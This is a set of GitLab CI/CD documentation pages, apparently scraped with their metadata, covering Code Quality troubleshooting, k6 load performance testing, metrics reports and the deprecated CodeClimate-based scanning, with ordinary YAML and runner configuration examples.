--- stage: Application Security Testing group: Static Analysis info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Troubleshooting Code Quality breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} When working with Code Quality, you might encounter the following issues. ## The code cannot be found and the pipeline runs always with default configuration You are probably using a private runner with the Docker-in-Docker socket-binding configuration. You should configure Code Quality checks to run on your worker as documented in [Use private runners](code_quality_codeclimate_scanning.md#use-private-runners). ## Changing the default configuration has no effect A common issue is that the terms `Code Quality` (GitLab specific) and `Code Climate` (Engine used by GitLab) are very similar. You must add a **`.codeclimate.yml`** file to change the default configuration, **not** a `.codequality.yml` file. If you use the wrong filename, the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template) is still used. ## No Code Quality report is displayed in a merge request Code Quality reports from the source or target branch may be missing for comparison on the merge request, so no information can be displayed. Missing report on the source branch can be due to: 1. Use of the [`REPORT_STDOUT` environment variable](https://gitlab.com/gitlab-org/ci-cd/codequality#environment-variables), no report file is generated and nothing displays in the merge request. Missing report on the target branch can be due to: - Newly added Code Quality job in your `.gitlab-ci.yml`. - Your pipeline is not set to run the Code Quality job on your target branch. - Commits are made to the default branch that do not run the Code Quality job. - The [`artifacts:expire_in`](../yaml/_index.md#artifactsexpire_in) CI/CD setting can cause the Code Quality artifacts to expire faster than desired. Verify the presence of report on the base commit by obtaining the `base_sha` using the [merge request API](../../api/merge_requests.md#get-single-mr) and use the [pipelines API with the `sha` attribute](../../api/pipelines.md#list-project-pipelines) to check if pipelines ran. ## No Code Quality symbol in the changes view If no symbol is displayed in the [changes view](code_quality.md#merge-request-changes-view), ensure that the `location.path` in the code quality report: - Is using a relative path to the file containing the code quality violation. - Is not prefixed with `./`. For example, the `path` should be `somedir/file1.rb` instead of `./somedir/file1.rb`. ## Only a single Code Quality report is displayed, but more are defined Code Quality automatically [combines multiple reports](code_quality.md#scan-code-for-quality-violations). In GitLab 15.6 and earlier, Code Quality used only the artifact from the latest created job (with the largest job ID). Code Quality artifacts from earlier jobs were ignored. ## RuboCop errors When using Code Quality jobs on a Ruby project, you can encounter problems running RuboCop. For example, the following error can appear when using either a very recent or very old version of Ruby: ```plaintext /usr/local/bundle/gems/rubocop-0.52.1/lib/rubocop/config.rb:510:in `check_target_ruby': Unknown Ruby version 2.7 found in `.ruby-version`. (RuboCop::ValidationError) Supported versions: 2.1, 2.2, 2.3, 2.4, 2.5 ``` This is caused by the default version of RuboCop used by the check engine not covering support for the Ruby version in use. To use a custom version of RuboCop that [supports the version of Ruby used by the project](https://docs.rubocop.org/rubocop/compatibility.html#support-matrix), you can [override the configuration through a `.codeclimate.yml` file](https://docs.codeclimate.com/docs/rubocop#using-rubocops-newer-versions) created in the project repository. For example, to specify using RuboCop release **0.67**: ```yaml version: "2" plugins: rubocop: enabled: true channel: rubocop-0-67 ``` ## No Code Quality appears on merge requests when using custom tool If your merge requests do not show any Code Quality changes when using a custom tool, ensure that *all* line properties in the JSON are `integer`. ## Error: `Could not analyze code quality` You might get the error: ```shell error: (CC::CLI::Analyze::EngineFailure) engine pmd ran for 900 seconds and was killed Could not analyze code quality for the repository at /code ``` If you enabled any of the Code Climate plugins, and the Code Quality CI/CD job fails with this error message, it's likely the job takes longer than the default timeout of 900 seconds: To work around this problem, set `TIMEOUT_SECONDS` to a higher value in your `.gitlab-ci.yml` file. For example: ```yaml code_quality: variables: TIMEOUT_SECONDS: 3600 ``` ## Using Code Quality with a Kubernetes or OpenShift runner CodeClimate-based scanning has special requirements. You may need to [Configure Kubernetes or OpenShift runners for CodeClimate-based scanning](code_quality_codeclimate_scanning.md#configure-kubernetes-or-openshift-runners) before scans work properly. ## Error: `x509: certificate signed by unknown authority` If you set the `CODE_QUALITY_IMAGE` to an image that is hosted in a Docker registry which uses a TLS certificate that is not trusted, such as a self-signed certificate, you might see the following error: ```shell $ docker pull --quiet "$CODE_QUALITY_IMAGE" Error response from daemon: Get https://gitlab.example.com/v2/: x509: certificate signed by unknown authority ``` To fix this, configure the Docker daemon to [trust certificates](https://distribution.github.io/distribution/about/insecure/#use-self-signed-certificates) by putting the certificate inside of the `/etc/docker/certs.d` directory. This Docker daemon is exposed to the subsequent Code Quality Docker container in the [GitLab Code Quality template](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.8.3-ee/lib/gitlab/ci/templates/Jobs/Code-Quality.gitlab-ci.yml#L41) and should be to exposed any other containers in which you want to have your certificate configuration apply. ### Docker If you have access to GitLab Runner configuration, add the directory as a [volume mount](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#volumes-in-the-runnersdocker-section). Replace `gitlab.example.com` with the actual domain of the registry. Example: ```toml [[runners]] ... executor = "docker" [runners.docker] ... privileged = true volumes = ["/cache", "/etc/gitlab-runner/certs/gitlab.example.com.crt:/etc/docker/certs.d/gitlab.example.com/ca.crt:ro"] ``` ### Kubernetes If you have access to GitLab Runner configuration and the Kubernetes cluster, you can [mount a ConfigMap](https://docs.gitlab.com/runner/executors/kubernetes/#configmap-volume). Replace `gitlab.example.com` with the actual domain of the registry. 1. Create a ConfigMap with the certificate: ```shell kubectl create configmap registry-crt --namespace gitlab-runner --from-file /etc/gitlab-runner/certs/gitlab.example.com.crt ``` 1. Update GitLab Runner `config.toml` to specify the ConfigMap: ```toml [[runners]] ... executor = "kubernetes" [runners.kubernetes] image = "alpine:3.12" privileged = true [[runners.kubernetes.volumes.config_map]] name = "registry-crt" mount_path = "/etc/docker/certs.d/gitlab.example.com/ca.crt" sub_path = "gitlab.example.com.crt" ``` ## Failed to load Code Quality report The Code Quality report can fail to load when there are issues parsing data from the artifact file. To gain insight into the errors, you can execute a GraphQL query using the following steps: 1. Go to the pipeline details page. 1. Append `.json` to the URL. 1. Copy the `iid` of the pipeline. 1. Go to the [interactive GraphQL explorer](../../api/graphql/_index.md#interactive-graphql-explorer). 1. Run the following query: ```graphql { project(fullPath: "<fullpath-to-your-project>") { pipeline(iid: "<iid>") { codeQualityReports { count nodes { line description path fingerprint severity } pageInfo { hasNextPage hasPreviousPage startCursor endCursor } } } } } ``` ## No report artifact is created With certain Runner configurations, the Code Quality scanning job may not have access to your source code. If this happens, the `gl-code-quality-report.json` artifact won't be created. To resolve this issue, either: - Use the [documented Runner configuration for Docker-in-Docker](../docker/using_docker_build.md#use-docker-in-docker), which uses privileged mode instead of Docker socket binding. - Apply the [community workaround in issue 32027](https://gitlab.com/gitlab-org/gitlab/-/issues/32027#note_1318822628) if you wish to continue using Docker socket binding. For more details, see [Change Runner configuration](code_quality_codeclimate_scanning.md#change-runner-configuration).
https://docs.gitlab.com/ci/load_performance_testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/load_performance_testing.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
load_performance_testing.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Load Performance Testing
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} With Load Performance Testing, you can test the impact of any pending code changes to your application's backend in [GitLab CI/CD](../_index.md). GitLab uses [k6](https://k6.io/), a free and open source tool, for measuring the system performance of applications under load. Unlike [Browser Performance Testing](browser_performance_testing.md), which is used to measure how web sites perform in client browsers, Load Performance Testing can be used to perform various types of [load tests](https://k6.io/docs/#use-cases) against application endpoints such as APIs, Web Controllers, and so on. This can be used to test how the backend or the server performs at scale. For example, you can use Load Performance Testing to perform many concurrent GET calls to a popular API endpoint in your application to see how it performs. ## How Load Performance Testing works First, define a job in your `.gitlab-ci.yml` file that generates the [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). GitLab checks this report, compares key load performance metrics between the source and target branches, and then shows the information in a merge request widget: ![Load Performance Widget](img/load_performance_testing_v13_2.png) Next, you need to configure the test environment and write the k6 test. The key performance metrics that the merge request widget shows after the test completes are: - Checks: The percentage pass rate of the [checks](https://k6.io/docs/using-k6/checks) configured in the k6 test. - TTFB P90: The 90th percentile of how long it took to start receiving responses, aka the [Time to First Byte](https://en.wikipedia.org/wiki/Time_to_first_byte) (TTFB). - TTFB P95: The 95th percentile for TTFB. - RPS: The average requests per second (RPS) rate the test was able to achieve. {{< alert type="note" >}} If the Load Performance report has no data to compare, such as when you add the Load Performance job in your `.gitlab-ci.yml` for the very first time, the Load Performance report widget doesn't display. It must have run at least once on the target branch (`main`, for example), before it displays in a merge request targeting that branch. {{< /alert >}} ## Configure the Load Performance Testing job Configuring your Load Performance Testing job can be broken down into several distinct parts: - Determine the test parameters such as throughput, and so on. - Set up the target test environment for load performance testing. - Design and write the k6 test. ### Determine the test parameters The first thing you need to do is determine the [type of load test](https://grafana.com/load-testing/types-of-load-testing/) you want to run, and how you want it to run (for example, the number of users, throughput, and so on). Refer to the [k6 docs](https://k6.io/docs/), especially the [k6 testing guides](https://k6.io/docs/testing-guides) for guidance. ### Test Environment setup A large part of the effort around load performance testing is to prepare the target test environment for high loads. You should ensure it's able to handle the [throughput](https://k6.io/blog/monthly-visits-concurrent-users) it is tested with. It's also typically required to have representative test data in the target environment for the load performance test to use. We strongly recommend [not running these tests against a production environment](https://k6.io/our-beliefs#load-test-in-a-pre-production-environment). ### Write the load performance test After the environment is prepared, you can write the k6 test itself. k6 is a flexible tool and can be used to run [many kinds of performance tests](https://grafana.com/load-testing/types-of-load-testing/). Refer to the [k6 documentation](https://k6.io/docs/) for detailed information on how to write tests. ### Configure the test in GitLab CI/CD When your k6 test is ready, the next step is to configure the load performance testing job in GitLab CI/CD. The easiest way to do this is to use the [`Verify/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Load-Performance-Testing.gitlab-ci.yml) template that is included with GitLab. {{< alert type="note" >}} For large scale k6 tests you need to ensure the GitLab Runner instance performing the actual test is able to handle running the test. Refer to [k6's guidance](https://k6.io/docs/testing-guides/running-large-tests#hardware-considerations) for spec details. The [default shared GitLab.com runners](../runners/hosted_runners/linux.md) likely have insufficient specs to handle most large k6 tests. {{< /alert >}} This template runs the [k6 Docker container](https://hub.docker.com/r/loadimpact/k6/) in the job and provides several ways to customize the job. An example configuration workflow: 1. Set up GitLab Runner to run Docker containers, like the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). 1. Configure the default Load Performance Testing CI/CD job in your `.gitlab-ci.yml` file. You need to include the template and configure it with CI/CD variables: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> ``` The previous example creates a `load_performance` job in your CI/CD pipeline that runs the k6 test. {{< alert type="note" >}} For Kubernetes setups a different template should be used: [`Jobs/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Load-Performance-Testing.gitlab-ci.yml). {{< /alert >}} k6 has [various options](https://k6.io/docs/using-k6/k6-options/reference/) to configure how it runs the tests, such as what throughput (RPS) to run with, how long the test should run, and so on. Almost all options can be configured in the test itself, but as you can also pass command line options via the `K6_OPTIONS` variable. For example, you can override the duration of the test with a CLI option: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> K6_OPTIONS: '--duration 30s' ``` GitLab only displays the key performance metrics in the MR widget if k6's results are saved via [summary export](https://k6.io/docs/results-output/real-time/json/#summary-export) as a [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). The latest Load Performance artifact available is always used, using the summary values from the test. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser. ### Load Performance testing in review apps The previous CI/CD YAML configuration example works for testing against static environments, but it can be extended to work with [review apps](../review_apps/_index.md) or [dynamic environments](../environments/_index.md) with a few extra steps. The best approach is to capture the dynamic URL in a [`.env` file](https://docs.docker.com/compose/environment-variables/env-file/) as a job artifact to be shared, then use a custom CI/CD variable we've provided named `K6_DOCKER_OPTIONS` to configure the k6 Docker container to use the file. With this, k6 can then use any environment variables from the `.env` file in scripts using standard JavaScript, such as: ``http.get(`${__ENV.ENVIRONMENT_URL}`)``. For example: 1. In the `review` job: 1. Capture the dynamic URL and save it into a `.env` file, for example, `echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env`. 1. Set the `.env` file to be a [job artifact](../jobs/job_artifacts.md). 1. In the `load_performance` job: 1. Set it to depend on the review job, so it inherits the environment file. 1. Set the `K6_DOCKER_OPTIONS` variable with the [Docker CLI option for environment files](https://docs.docker.com/reference/cli/docker/container/run/#env), for example `--env-file review.env`. 1. Configure the k6 test script to use the environment variable in it's steps. Your `.gitlab-ci.yml` file might be similar to: ```yaml stages: - deploy - performance include: template: Verify/Load-Performance-Testing.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_ENVIRONMENT_SLUG.example.com script: - run_deploy_script - echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env artifacts: paths: - review.env rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. load_performance: dependencies: - review variables: K6_DOCKER_OPTIONS: '--env-file review.env' rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. ```
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Load Performance Testing breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} With Load Performance Testing, you can test the impact of any pending code changes to your application's backend in [GitLab CI/CD](../_index.md). GitLab uses [k6](https://k6.io/), a free and open source tool, for measuring the system performance of applications under load. Unlike [Browser Performance Testing](browser_performance_testing.md), which is used to measure how web sites perform in client browsers, Load Performance Testing can be used to perform various types of [load tests](https://k6.io/docs/#use-cases) against application endpoints such as APIs, Web Controllers, and so on. This can be used to test how the backend or the server performs at scale. For example, you can use Load Performance Testing to perform many concurrent GET calls to a popular API endpoint in your application to see how it performs. ## How Load Performance Testing works First, define a job in your `.gitlab-ci.yml` file that generates the [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). GitLab checks this report, compares key load performance metrics between the source and target branches, and then shows the information in a merge request widget: ![Load Performance Widget](img/load_performance_testing_v13_2.png) Next, you need to configure the test environment and write the k6 test. The key performance metrics that the merge request widget shows after the test completes are: - Checks: The percentage pass rate of the [checks](https://k6.io/docs/using-k6/checks) configured in the k6 test. - TTFB P90: The 90th percentile of how long it took to start receiving responses, aka the [Time to First Byte](https://en.wikipedia.org/wiki/Time_to_first_byte) (TTFB). - TTFB P95: The 95th percentile for TTFB. - RPS: The average requests per second (RPS) rate the test was able to achieve. {{< alert type="note" >}} If the Load Performance report has no data to compare, such as when you add the Load Performance job in your `.gitlab-ci.yml` for the very first time, the Load Performance report widget doesn't display. It must have run at least once on the target branch (`main`, for example), before it displays in a merge request targeting that branch. {{< /alert >}} ## Configure the Load Performance Testing job Configuring your Load Performance Testing job can be broken down into several distinct parts: - Determine the test parameters such as throughput, and so on. - Set up the target test environment for load performance testing. - Design and write the k6 test. ### Determine the test parameters The first thing you need to do is determine the [type of load test](https://grafana.com/load-testing/types-of-load-testing/) you want to run, and how you want it to run (for example, the number of users, throughput, and so on). Refer to the [k6 docs](https://k6.io/docs/), especially the [k6 testing guides](https://k6.io/docs/testing-guides) for guidance. ### Test Environment setup A large part of the effort around load performance testing is to prepare the target test environment for high loads. You should ensure it's able to handle the [throughput](https://k6.io/blog/monthly-visits-concurrent-users) it is tested with. It's also typically required to have representative test data in the target environment for the load performance test to use. We strongly recommend [not running these tests against a production environment](https://k6.io/our-beliefs#load-test-in-a-pre-production-environment). ### Write the load performance test After the environment is prepared, you can write the k6 test itself. k6 is a flexible tool and can be used to run [many kinds of performance tests](https://grafana.com/load-testing/types-of-load-testing/). Refer to the [k6 documentation](https://k6.io/docs/) for detailed information on how to write tests. ### Configure the test in GitLab CI/CD When your k6 test is ready, the next step is to configure the load performance testing job in GitLab CI/CD. The easiest way to do this is to use the [`Verify/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Verify/Load-Performance-Testing.gitlab-ci.yml) template that is included with GitLab. {{< alert type="note" >}} For large scale k6 tests you need to ensure the GitLab Runner instance performing the actual test is able to handle running the test. Refer to [k6's guidance](https://k6.io/docs/testing-guides/running-large-tests#hardware-considerations) for spec details. The [default shared GitLab.com runners](../runners/hosted_runners/linux.md) likely have insufficient specs to handle most large k6 tests. {{< /alert >}} This template runs the [k6 Docker container](https://hub.docker.com/r/loadimpact/k6/) in the job and provides several ways to customize the job. An example configuration workflow: 1. Set up GitLab Runner to run Docker containers, like the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). 1. Configure the default Load Performance Testing CI/CD job in your `.gitlab-ci.yml` file. You need to include the template and configure it with CI/CD variables: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> ``` The previous example creates a `load_performance` job in your CI/CD pipeline that runs the k6 test. {{< alert type="note" >}} For Kubernetes setups a different template should be used: [`Jobs/Load-Performance-Testing.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Load-Performance-Testing.gitlab-ci.yml). {{< /alert >}} k6 has [various options](https://k6.io/docs/using-k6/k6-options/reference/) to configure how it runs the tests, such as what throughput (RPS) to run with, how long the test should run, and so on. Almost all options can be configured in the test itself, but as you can also pass command line options via the `K6_OPTIONS` variable. For example, you can override the duration of the test with a CLI option: ```yaml include: template: Verify/Load-Performance-Testing.gitlab-ci.yml load_performance: variables: K6_TEST_FILE: <PATH TO K6 TEST FILE IN PROJECT> K6_OPTIONS: '--duration 30s' ``` GitLab only displays the key performance metrics in the MR widget if k6's results are saved via [summary export](https://k6.io/docs/results-output/real-time/json/#summary-export) as a [Load Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsload_performance). The latest Load Performance artifact available is always used, using the summary values from the test. If [GitLab Pages](../../user/project/pages/_index.md) is enabled, you can view the report directly in your browser. ### Load Performance testing in review apps The previous CI/CD YAML configuration example works for testing against static environments, but it can be extended to work with [review apps](../review_apps/_index.md) or [dynamic environments](../environments/_index.md) with a few extra steps. The best approach is to capture the dynamic URL in a [`.env` file](https://docs.docker.com/compose/environment-variables/env-file/) as a job artifact to be shared, then use a custom CI/CD variable we've provided named `K6_DOCKER_OPTIONS` to configure the k6 Docker container to use the file. With this, k6 can then use any environment variables from the `.env` file in scripts using standard JavaScript, such as: ``http.get(`${__ENV.ENVIRONMENT_URL}`)``. For example: 1. In the `review` job: 1. Capture the dynamic URL and save it into a `.env` file, for example, `echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env`. 1. Set the `.env` file to be a [job artifact](../jobs/job_artifacts.md). 1. In the `load_performance` job: 1. Set it to depend on the review job, so it inherits the environment file. 1. Set the `K6_DOCKER_OPTIONS` variable with the [Docker CLI option for environment files](https://docs.docker.com/reference/cli/docker/container/run/#env), for example `--env-file review.env`. 1. Configure the k6 test script to use the environment variable in it's steps. Your `.gitlab-ci.yml` file might be similar to: ```yaml stages: - deploy - performance include: template: Verify/Load-Performance-Testing.gitlab-ci.yml review: stage: deploy environment: name: review/$CI_COMMIT_REF_SLUG url: http://$CI_ENVIRONMENT_SLUG.example.com script: - run_deploy_script - echo "ENVIRONMENT_URL=$CI_ENVIRONMENT_URL" >> review.env artifacts: paths: - review.env rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. load_performance: dependencies: - review variables: K6_DOCKER_OPTIONS: '--env-file review.env' rules: - if: $CI_COMMIT_BRANCH # Modify to match your pipeline rules, or use `only/except` if needed. ```
https://docs.gitlab.com/ci/metrics_reports
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/metrics_reports.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
metrics_reports.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Metrics reports
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Metrics reports display custom metrics in merge requests to track performance, memory usage, and other measurements between branches. Use metrics reports to: - Monitor memory usage changes. - Track load testing results. - Measure code complexity. - Compare code coverage statistics. ## Metrics processing workflow When a pipeline runs, GitLab reads metrics from the report artifact and stores them as string values for comparison. The default filename is `metrics.txt`. For a merge request, GitLab compares the metrics from the feature branch to the values from the target branch and displays them in the merge request widget in this order: - Existing metrics with changed values. - Metrics added by the merge request (marked with a **New** badge). - Metrics removed by the merge request (marked with a **Removed** badge). - Existing metrics with unchanged values. ## Configure metrics reports Add metrics reports to your CI/CD pipeline to track custom metrics in merge requests. Prerequisites: - The metrics file must use the [OpenMetrics](https://prometheus.io/docs/instrumenting/exposition_formats/#openmetrics-text-format) text format. To configure metrics reports: 1. In your `.gitlab-ci.yml` file, add a job that generates a metrics report. 1. Add a script to the job that generates metrics in OpenMetrics format. 1. Configure the job to upload the metrics file with [`artifacts:reports:metrics`](../yaml/artifacts_reports.md#artifactsreportsmetrics). For example: ```yaml metrics: stage: test script: - echo 'memory_usage_bytes 2621440' > metrics.txt - echo 'response_time_seconds 0.234' >> metrics.txt - echo 'test_coverage_percent 87.5' >> metrics.txt - echo '# EOF' >> metrics.txt artifacts: reports: metrics: metrics.txt ``` After the pipeline runs, the metrics reports display in the merge request widget. ![Metrics report widget in a merge request displaying metric names and values.](img/metrics_report_v18_3.png) For additional format specifications and examples, see [Prometheus text format details](https://prometheus.io/docs/instrumenting/exposition_formats/#text-format-details). ## Troubleshooting When working with metrics reports, you might encounter the following issues. ### Metrics reports did not change You might see **Metrics report scanning detected no new changes** when viewing metrics reports in merge requests. This issue occurs when: - The target branch doesn't have a baseline metrics report for comparison. - Your GitLab subscription doesn't include metrics reports (Premium or Ultimate required). To resolve this issue: 1. Verify your GitLab subscription tier includes metrics reports. 1. Ensure the target branch has a pipeline with metrics reports configured. 1. Verify that your metrics file uses valid OpenMetrics format.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Metrics reports breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Metrics reports display custom metrics in merge requests to track performance, memory usage, and other measurements between branches. Use metrics reports to: - Monitor memory usage changes. - Track load testing results. - Measure code complexity. - Compare code coverage statistics. ## Metrics processing workflow When a pipeline runs, GitLab reads metrics from the report artifact and stores them as string values for comparison. The default filename is `metrics.txt`. For a merge request, GitLab compares the metrics from the feature branch to the values from the target branch and displays them in the merge request widget in this order: - Existing metrics with changed values. - Metrics added by the merge request (marked with a **New** badge). - Metrics removed by the merge request (marked with a **Removed** badge). - Existing metrics with unchanged values. ## Configure metrics reports Add metrics reports to your CI/CD pipeline to track custom metrics in merge requests. Prerequisites: - The metrics file must use the [OpenMetrics](https://prometheus.io/docs/instrumenting/exposition_formats/#openmetrics-text-format) text format. To configure metrics reports: 1. In your `.gitlab-ci.yml` file, add a job that generates a metrics report. 1. Add a script to the job that generates metrics in OpenMetrics format. 1. Configure the job to upload the metrics file with [`artifacts:reports:metrics`](../yaml/artifacts_reports.md#artifactsreportsmetrics). For example: ```yaml metrics: stage: test script: - echo 'memory_usage_bytes 2621440' > metrics.txt - echo 'response_time_seconds 0.234' >> metrics.txt - echo 'test_coverage_percent 87.5' >> metrics.txt - echo '# EOF' >> metrics.txt artifacts: reports: metrics: metrics.txt ``` After the pipeline runs, the metrics reports display in the merge request widget. ![Metrics report widget in a merge request displaying metric names and values.](img/metrics_report_v18_3.png) For additional format specifications and examples, see [Prometheus text format details](https://prometheus.io/docs/instrumenting/exposition_formats/#text-format-details). ## Troubleshooting When working with metrics reports, you might encounter the following issues. ### Metrics reports did not change You might see **Metrics report scanning detected no new changes** when viewing metrics reports in merge requests. This issue occurs when: - The target branch doesn't have a baseline metrics report for comparison. - Your GitLab subscription doesn't include metrics reports (Premium or Ultimate required). To resolve this issue: 1. Verify your GitLab subscription tier includes metrics reports. 1. Ensure the target branch has a pipeline with metrics reports configured. 1. Verify that your metrics file uses valid OpenMetrics format.
https://docs.gitlab.com/ci/code_quality_codeclimate_scanning
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/code_quality_codeclimate_scanning.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
code_quality_codeclimate_scanning.md
Application Security Testing
Static Analysis
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Configure CodeClimate-based Code Quality scanning (deprecated)
null
<!--- start_remove The following content will be removed on remove_date: '2025-08-15' --> {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](code_quality.md#import-code-quality-results-from-a-cicd-job) instead. This change is a breaking change. {{< /alert >}} Code Quality includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yaml`. This template runs a scan based on the open source CodeClimate scanning engine. The CodeClimate engine runs: - Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability). - A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code. ## Enable CodeClimate-based scanning Prerequisites: - GitLab CI/CD configuration (`.gitlab-ci.yml`) must include the `test` stage. - If you're using instance runners, the Code Quality job must be configured for the [Docker-in-Docker workflow](../docker/using_docker_build.md#use-docker-in-docker). When using this workflow, the `/builds` volume must be mapped to allow reports to be saved. - If you're using private runners, you should use an [alternative configuration](#use-private-runners) recommended for running Code Quality analysis more efficiently. - The runner must have enough disk space to store the generated Code Quality files. For example, on the [GitLab project](https://gitlab.com/gitlab-org/gitlab) the files are approximately 7 GB. To enable Code Quality, either: - Enable [Auto DevOps](../../topics/autodevops/_index.md), which includes [Auto Code Quality](../../topics/autodevops/stages.md#auto-code-quality). - Include the [Code Quality template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Jobs/Code-Quality.gitlab-ci.yml) in your `.gitlab-ci.yml` file. Example: ```yaml include: - template: Jobs/Code-Quality.gitlab-ci.yml ``` Code Quality now runs in pipelines. {{< alert type="warning" >}} On GitLab Self-Managed, if a malicious actor compromises the Code Quality job definition they could execute privileged Docker commands on the runner host. Having proper access control policies mitigates this attack vector by allowing access only to trusted actors. {{< /alert >}} ## Disable CodeClimate-based scanning The `code_quality` job doesn't run if the `$CODE_QUALITY_DISABLED` CI/CD variable is present. For more information about how to define a variable, see [GitLab CI/CD variables](../variables/_index.md). To disable Code Quality, create a custom CI/CD variable named `CODE_QUALITY_DISABLED`, for either: - [The whole project](../variables/_index.md#for-a-project). - [A single pipeline](../pipelines/_index.md#run-a-pipeline-manually). ## Configure CodeClimate analysis plugins By default, the `code_quality` job configures CodeClimate to: - Use [a specific set of plugins](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template?ref_type=heads). - Use [default configurations](https://gitlab.com/gitlab-org/ci-cd/codequality/-/tree/master/codeclimate_defaults?ref_type=heads) for those plugins. To scan more languages, you can enable more [plugins](https://docs.codeclimate.com/docs/list-of-engines). You can also disable plugins that the `code_quality` job enables by default. For example, to use the [SonarJava analyzer](https://docs.codeclimate.com/docs/sonar-java): 1. Add a file named `.codeclimate.yml` to the root of your repository 1. Add the [enablement code](https://docs.codeclimate.com/docs/sonar-java#enable-the-plugin) for the plugin to the root of your repository to the `.codeclimate.yml` file: ```yaml version: "2" plugins: sonar-java: enabled: true ``` This adds SonarJava to the `plugins:` section of the [default `.codeclimate.yml`](https://gitlab.com/gitlab-org/ci-cd/codequality/-/blob/master/codeclimate_defaults/.codeclimate.yml.template) included in your project. Changes to the `plugins:` section do not affect the `exclude_patterns` section of the default `.codeclimate.yml`. See the Code Climate documentation on [excluding files and folders](https://docs.codeclimate.com/docs/excluding-files-and-folders) for more details. ## Customize scan job settings You can change the behavior of the `code_quality` scan job by setting [CI/CD variables](#available-cicd-variables) in your GitLab CI/CD YAML. To configure the Code Quality job: 1. Declare a job with the same name as the Code Quality job, after the template's inclusion. 1. Specify additional keys in the job's stanza. For an example, see [Download output in HTML format](#output-in-only-html-format). ### Available CI/CD variables Code Quality can be customized by defining available CI/CD variables: | CI/CD variable | Description | |---------------------------------|-------------| | `CODECLIMATE_DEBUG` | Set to enable [Code Climate debug mode](https://github.com/codeclimate/codeclimate#environment-variables). | | `CODECLIMATE_DEV` | Set to enable `--dev` mode which lets you run engines not known to the CLI. | | `CODECLIMATE_PREFIX` | Set a prefix to use with all `docker pull` commands in CodeClimate engines. 